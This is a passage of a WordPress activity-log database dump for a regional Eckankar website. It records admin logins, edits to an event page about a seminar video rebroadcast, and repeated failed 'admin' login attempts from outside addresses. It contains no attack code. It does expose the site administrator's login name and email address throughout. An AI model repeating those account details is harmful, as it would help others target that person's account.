right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236775,40257,'post_title','Home'),(236774,40257,'post_type','page'),(236773,40257,'post_id','7160'),(236772,40256,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(236771,40256,'_server_remote_addr','76.130.120.x'),(236768,40256,'_user_id','2'),(236769,40256,'_user_login','S8zhaBda'),(236770,40256,'_user_email','nada@zipnadanot.org'),(236767,40256,'_message_key','attachment_created'),(236766,40256,'attachment_filesize','10346'),(236765,40256,'attachment_mime','image/png'),(236762,40256,'attachment_id','269274'),(236763,40256,'attachment_title','wave-white-2'),(236764,40256,'attachment_filename','wave-white-2.png'),(236761,40256,'post_type','attachment'),(236760,40255,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(236759,40255,'_server_remote_addr','76.130.120.x'),(236757,40255,'_user_login','S8zhaBda'),(236758,40255,'_user_email','nada@zipnadanot.org'),(236756,40255,'_user_id','2'),(236752,40255,'term_id','203'),(236753,40255,'term_name','waves'),(236754,40255,'term_taxonomy','media_folder'),(236755,40255,'_message_key','created_term'),(236750,40254,'_message_key','user_unknown_login_failed'),(236751,40254,'_server_remote_addr','23.99.229.x'),(236748,40254,'failed_username','admin'),(236749,40254,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(236746,40253,'_server_remote_addr','76.130.120.x'),(236747,40253,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(236745,40253,'_message_key','user_logged_in'),(236741,40253,'_user_id','2'),(236742,40253,'_user_login','S8zhaBda'),(236743,40253,'_user_email','nada@zipnadanot.org'),(236744,40253,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(236739,40253,'user_email','nada@zipnadanot.org'),(236740,40253,'user_login','S8zhaBda'),(236738,40253,'user_id','2'),(236734,40252,'_user_email','nada@zipnadanot.org'),(236735,40252,'_message_key','user_logged_out'),(236736,40252,'_server_remote_addr','76.130.120.x'),(236737,40252,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(236733,40252,'_user_login','S8zhaBda'),(236732,40252,'_user_id','2'),(236731,40251,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(236729,40251,'_message_key','user_logged_in'),(236727,40251,'_user_email','nada@zipnadanot.org'),(236730,40251,'_server_remote_addr','76.130.120.x'),(236728,40251,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(236726,40251,'_user_login','S8zhaBda'),(236724,40251,'user_login','S8zhaBda'),(236725,40251,'_user_id','2'),(236721,40250,'_server_remote_addr','20.168.8.x'),(236722,40251,'user_id','2'),(236723,40251,'user_email','nada@zipnadanot.org'),(236720,40250,'_message_key','user_unknown_login_failed'),(236719,40250,'server_http_user_agent','Mozilla/5.0'),(236718,40250,'failed_username','admin'),(236717,40249,'_server_remote_addr','20.168.9.x'),(236716,40249,'_message_key','user_unknown_login_failed'),(236713,40248,'_server_remote_addr','20.168.9.x'),(236714,40249,'failed_username','admin'),(236715,40249,'server_http_user_agent','Mozilla/5.0'),(236708,40247,'_message_key','user_unknown_login_failed'),(236709,40247,'_server_remote_addr','94.23.61.x'),(236710,40248,'failed_username','admin'),(236711,40248,'server_http_user_agent','Mozilla/5.0'),(236712,40248,'_message_key','user_unknown_login_failed'),(236707,40247,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(236705,40246,'_server_remote_addr','103.90.163.x'),(236706,40247,'failed_username','admin'),(236704,40246,'_message_key','user_unknown_login_failed'),(236703,40246,'server_http_user_agent','Mozilla/5.0'),(236702,40246,'failed_username','admin'),(236701,40245,'_server_remote_addr','20.168.8.x'),(236700,40245,'_message_key','user_unknown_login_failed'),(236699,40245,'server_http_user_agent','Mozilla/5.0'),(236698,40245,'failed_username','admin'),(236697,40244,'_server_remote_addr','20.168.9.x'),(236696,40244,'_message_key','user_unknown_login_failed'),(236695,40244,'server_http_user_agent','Mozilla/5.0'),(236694,40244,'failed_username','admin'),(236693,40243,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=b63b827a8a&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(236692,40243,'_server_remote_addr','76.130.120.x'),(236691,40243,'_message_key','user_logged_out'),(236690,40243,'_user_email','nada@zipnadanot.org'),(236689,40243,'_user_login','S8zhaBda'),(236688,40243,'_user_id','2'),(236687,40242,'_server_remote_addr','20.168.9.x'),(236686,40242,'_message_key','user_unknown_login_failed'),(236684,40242,'failed_username','admin'),(236685,40242,'server_http_user_agent','Mozilla/5.0'),(236683,40241,'_server_remote_addr','103.90.163.x'),(236682,40241,'_message_key','user_unknown_login_failed'),(236681,40241,'server_http_user_agent','Mozilla/5.0'),(236680,40241,'failed_username','admin'),(236679,40240,'_server_remote_addr','20.168.8.x'),(236678,40240,'_message_key','user_unknown_login_failed'),(236677,40240,'server_http_user_agent','Mozilla/5.0'),(236674,40239,'_message_key','user_unknown_login_failed'),(236675,40239,'_server_remote_addr','20.168.9.x'),(236676,40240,'failed_username','admin'),(236673,40239,'server_http_user_agent','Mozilla/5.0'),(236672,40239,'failed_username','admin'),(236671,40238,'_server_remote_addr','20.168.9.x'),(236670,40238,'_message_key','user_unknown_login_failed'),(236669,40238,'server_http_user_agent','Mozilla/5.0'),(236668,40238,'failed_username','admin'),(236667,40237,'_server_remote_addr','111.230.202.x'),(236665,40237,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(236666,40237,'_message_key','user_unknown_login_failed'),(236664,40237,'failed_username','admin'),(236659,40235,'_server_remote_addr','20.168.9.x'),(236660,40236,'failed_username','admin'),(236661,40236,'server_http_user_agent','Mozilla/5.0'),(236662,40236,'_message_key','user_unknown_login_failed'),(236663,40236,'_server_remote_addr','103.90.163.x'),(236656,40235,'failed_username','admin'),(236657,40235,'server_http_user_agent','Mozilla/5.0'),(236658,40235,'_message_key','user_unknown_login_failed'),(236655,40234,'_server_remote_addr','20.168.8.x'),(236654,40234,'_message_key','user_unknown_login_failed'),(236653,40234,'server_http_user_agent','Mozilla/5.0'),(236652,40234,'failed_username','admin'),(236650,40233,'_server_remote_addr','76.130.120.x'),(236651,40233,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269272&action=edit'),(236647,40233,'_user_id','2'),(236648,40233,'_user_login','S8zhaBda'),(236649,40233,'_user_email','nada@zipnadanot.org'),(236646,40233,'_message_key','post_updated'),(236645,40233,'post_new_post_title','Video Rebroadcast - Sri Harold Klemp'),(236642,40233,'post_type','mec-events'),(236643,40233,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(236644,40233,'post_prev_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(236641,40233,'post_id','269272'),(236639,40232,'_server_remote_addr','76.130.120.x'),(236640,40232,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=202&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(236638,40232,'_user_email','nada@zipnadanot.org'),(236637,40232,'_user_login','S8zhaBda'),(236636,40232,'_user_id','2'),(236633,40232,'to_term_slug','video-rebroadcast-harold-klemp'),(236634,40232,'to_term_description',''),(236635,40232,'_message_key','edited_term'),(236632,40232,'to_term_taxonomy','mec_label'),(236631,40232,'to_term_name','Video Rebroadcast'),(236628,40232,'from_term_taxonomy','mec_label'),(236629,40232,'from_term_slug','video-rebroadcast-harold-klemp'),(236630,40232,'from_term_description',''),(236627,40232,'from_term_name','Video Rebroadcast'),(236626,40232,'term_id','202'),(236625,40231,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=202&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(236622,40231,'_user_login','S8zhaBda'),(236623,40231,'_user_email','nada@zipnadanot.org'),(236624,40231,'_server_remote_addr','76.130.120.x'),(236621,40231,'_user_id','2'),(236620,40231,'_message_key','edited_term'),(236617,40231,'to_term_taxonomy','mec_label'),(236618,40231,'to_term_slug','video-rebroadcast-harold-klemp'),(236619,40231,'to_term_description',''),(236615,40231,'from_term_description',''),(236616,40231,'to_term_name','Video Rebroadcast'),(236614,40231,'from_term_slug','video-rebroadcast-harold-klemp'),(236611,40231,'term_id','202'),(236612,40231,'from_term_name','Video Rebroadcast'),(236613,40231,'from_term_taxonomy','mec_label'),(236610,40230,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269272'),(236607,40230,'_user_login','S8zhaBda'),(236608,40230,'_user_email','nada@zipnadanot.org'),(236609,40230,'_server_remote_addr','76.130.120.x'),(236606,40230,'_user_id','2'),(236603,40230,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(236604,40230,'post_new_post_date_gmt','2023-10-27 15:16:00'),(236601,40230,'post_prev_post_date','2023-10-27 09:15:41'),(236605,40230,'_message_key','post_updated'),(236602,40230,'post_new_post_date','2023-10-27 09:16:00'),(236600,40230,'post_new_post_status','publish'),(236599,40230,'post_prev_post_status','draft'),(236598,40230,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Watch Sri Harold Klemp’s Saturday evening talk at the 2023 ECK Soul Adventure Seminar, which was held October 20 - 22 in Minneapolis, Minnesota. Then join us for fellowship and seminar highlight sharing from those that attended. This will be an in person event only.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>'),(236589,40229,'_user_email','nada@zipnadanot.org'),(236590,40229,'_server_remote_addr','76.130.120.x'),(236591,40229,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269272'),(236592,40230,'post_id','269272'),(236593,40230,'post_type','mec-events'),(236594,40230,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236595,40230,'post_prev_post_name',''),(236596,40230,'post_new_post_name','video-rebroadcast-in-personsri-harold-klemp-at-the-2022-eck-soul-adventure-seminar-3'),(236597,40230,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">&nbsp;</p>\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\n</span></p>\n</blockquote>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Watch Sri Harold Klemp’s Saturday evening talk at the 2023 ECK Soul Adventure Seminar, which was held October 20 - 22 in Minneapolis, Minnesota. Then join us for fellowship and seminar highlight sharing from those that attended. This will be an in person event only.<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\n</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"bg-white rounded-lg\">\n<div class=\"p-5\">\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\n<div class=\"\">\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\n</div>\n</div>\n</div>'),(236588,40229,'_user_login','S8zhaBda'),(236587,40229,'_user_id','2'),(236584,40229,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(236585,40229,'post_meta_added','67'),(236586,40229,'_message_key','post_updated'),(236583,40229,'post_new_thumb_id','267350'),(236582,40229,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236581,40229,'post_type','mec-events'),(236580,40229,'post_id','269272'),(236579,40228,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269272'),(236578,40228,'_server_remote_addr','76.130.120.x'),(236577,40228,'_user_email','nada@zipnadanot.org'),(236576,40228,'_user_login','S8zhaBda'),(236574,40228,'_message_key','post_updated'),(236575,40228,'_user_id','2'),(236573,40228,'post_meta_added','67'),(236571,40228,'post_new_thumb_id','267350'),(236572,40228,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(236570,40228,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236512,40222,'term_id','202'),(236513,40222,'term_name','Video Rebroadcast - Harold Klemp'),(236514,40222,'term_taxonomy','mec_label'),(236515,40222,'_message_key','created_term'),(236516,40222,'_user_id','2'),(236517,40222,'_user_login','S8zhaBda'),(236518,40222,'_user_email','nada@zipnadanot.org'),(236519,40222,'_server_remote_addr','76.130.120.x'),(236520,40222,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit-tags.php?taxonomy=mec_label&post_type=mec-events'),(236521,40223,'failed_username','admin'),(236522,40223,'server_http_user_agent','Mozilla/5.0'),(236523,40223,'_message_key','user_unknown_login_failed'),(236524,40223,'_server_remote_addr','103.90.163.x'),(236525,40224,'term_id','202'),(236526,40224,'from_term_name','Video Rebroadcast - Harold Klemp'),(236527,40224,'from_term_taxonomy','mec_label'),(236528,40224,'from_term_slug','video-rebroadcast-harold-klemp'),(236529,40224,'from_term_description',''),(236530,40224,'to_term_name','Video Rebroadcast'),(236531,40224,'to_term_taxonomy','mec_label'),(236532,40224,'to_term_slug','video-rebroadcast-harold-klemp'),(236533,40224,'to_term_description',''),(236534,40224,'_message_key','edited_term'),(236535,40224,'_user_id','2'),(236536,40224,'_user_login','S8zhaBda'),(236537,40224,'_user_email','nada@zipnadanot.org'),(236538,40224,'_server_remote_addr','76.130.120.x'),(236539,40224,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=202&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(236540,40225,'failed_username','admin'),(236541,40225,'server_http_user_agent','Mozilla/5.0'),(236542,40225,'_message_key','user_unknown_login_failed'),(236543,40225,'_server_remote_addr','20.168.9.x'),(236544,40226,'post_id','269272'),(236545,40226,'post_type','mec-events'),(236546,40226,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236547,40226,'post_new_thumb_id','267350'),(236548,40226,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(236549,40226,'post_meta_added','67'),(236550,40226,'_message_key','post_updated'),(236551,40226,'_user_id','2'),(236552,40226,'_user_login','S8zhaBda'),(236553,40226,'_user_email','nada@zipnadanot.org'),(236554,40226,'_server_remote_addr','76.130.120.x'),(236555,40226,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269272'),(236556,40227,'post_id','269272'),(236557,40227,'post_type','mec-events'),(236558,40227,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236559,40227,'post_new_thumb_id','267350'),(236560,40227,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(236561,40227,'post_meta_added','67'),(236562,40227,'_message_key','post_updated'),(236563,40227,'_user_id','2'),(236564,40227,'_user_login','S8zhaBda'),(236565,40227,'_user_email','nada@zipnadanot.org'),(236566,40227,'_server_remote_addr','76.130.120.x'),(236567,40227,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269272'),(236568,40228,'post_id','269272'),(236569,40228,'post_type','mec-events'),(236510,40221,'_server_remote_addr','76.130.120.x'),(236511,40221,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=b63b827a8a&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(236509,40221,'_user_email','nada@zipnadanot.org'),(236508,40221,'_user_login','S8zhaBda'),(236507,40221,'_user_id','2'),(236505,40221,'duplicated_post_id','267449'),(236506,40221,'_message_key','post_duplicated'),(236504,40221,'duplicated_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(236503,40221,'new_post_id','269272'),(236502,40221,'new_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(236479,40218,'_user_id','2'),(236480,40218,'_user_login','S8zhaBda'),(236481,40218,'_user_email','nada@zipnadanot.org'),(236482,40218,'_server_remote_addr','76.130.120.x'),(236483,40218,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269271'),(236484,40219,'post_id','269271'),(236485,40219,'post_type','mec-events'),(236486,40219,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(236487,40219,'_message_key','post_trashed'),(236488,40219,'_user_id','2'),(236489,40219,'_user_login','S8zhaBda'),(236490,40219,'_user_email','nada@zipnadanot.org'),(236491,40219,'_server_remote_addr','76.130.120.x'),(236492,40219,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269271'),(236493,40220,'post_id','269272'),(236494,40220,'post_type','mec-events'),(236495,40220,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(236496,40220,'_message_key','post_updated'),(236497,40220,'_user_id','2'),(236498,40220,'_user_login','S8zhaBda'),(236499,40220,'_user_email','nada@zipnadanot.org'),(236500,40220,'_server_remote_addr','76.130.120.x'),(236501,40220,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=b63b827a8a&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(236465,40217,'new_post_id','269271'),(236466,40217,'duplicated_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(236467,40217,'duplicated_post_id','267696'),(236468,40217,'_message_key','post_duplicated'),(236469,40217,'_user_id','2'),(236470,40217,'_user_login','S8zhaBda'),(236471,40217,'_user_email','nada@zipnadanot.org'),(236472,40217,'_server_remote_addr','76.130.120.x'),(236473,40217,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=b63b827a8a&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(236474,40218,'post_id','269271'),(236475,40218,'post_type','mec-events'),(236476,40218,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(236477,40218,'post_meta_added','78'),(236478,40218,'_message_key','post_updated'),(236464,40217,'new_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(236463,40216,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=b63b827a8a&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F28%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(236462,40216,'_server_remote_addr','76.130.120.x'),(236461,40216,'_user_email','nada@zipnadanot.org'),(236460,40216,'_user_login','S8zhaBda'),(236459,40216,'_user_id','2'),(236458,40216,'_message_key','post_updated'),(236455,40216,'post_id','269271'),(236456,40216,'post_type','mec-events'),(236457,40216,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(236452,40215,'_message_key','user_logged_in'),(236453,40215,'_server_remote_addr','76.130.120.x'),(236454,40215,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(236451,40215,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(236450,40215,'_user_email','nada@zipnadanot.org'),(236449,40215,'_user_login','S8zhaBda'),(236448,40215,'_user_id','2'),(236447,40215,'user_login','S8zhaBda'),(236426,40210,'server_http_user_agent','Mozilla/5.0'),(236427,40210,'_message_key','user_unknown_login_failed'),(236428,40210,'_server_remote_addr','20.168.9.x'),(236429,40211,'failed_username','admin'),(236430,40211,'server_http_user_agent','Mozilla/5.0'),(236431,40211,'_message_key','user_unknown_login_failed'),(236432,40211,'_server_remote_addr','20.168.9.x'),(236433,40212,'failed_username','admin'),(236434,40212,'server_http_user_agent','Mozilla/5.0'),(236435,40212,'_message_key','user_unknown_login_failed'),(236436,40212,'_server_remote_addr','103.90.163.x'),(236437,40213,'failed_username','admin'),(236438,40213,'server_http_user_agent','Mozilla/5.0'),(236439,40213,'_message_key','user_unknown_login_failed'),(236440,40213,'_server_remote_addr','20.168.8.x'),(236441,40214,'failed_username','admin'),(236442,40214,'server_http_user_agent','Mozilla/5.0'),(236443,40214,'_message_key','user_unknown_login_failed'),(236444,40214,'_server_remote_addr','20.168.9.x'),(236445,40215,'user_id','2'),(236446,40215,'user_email','nada@z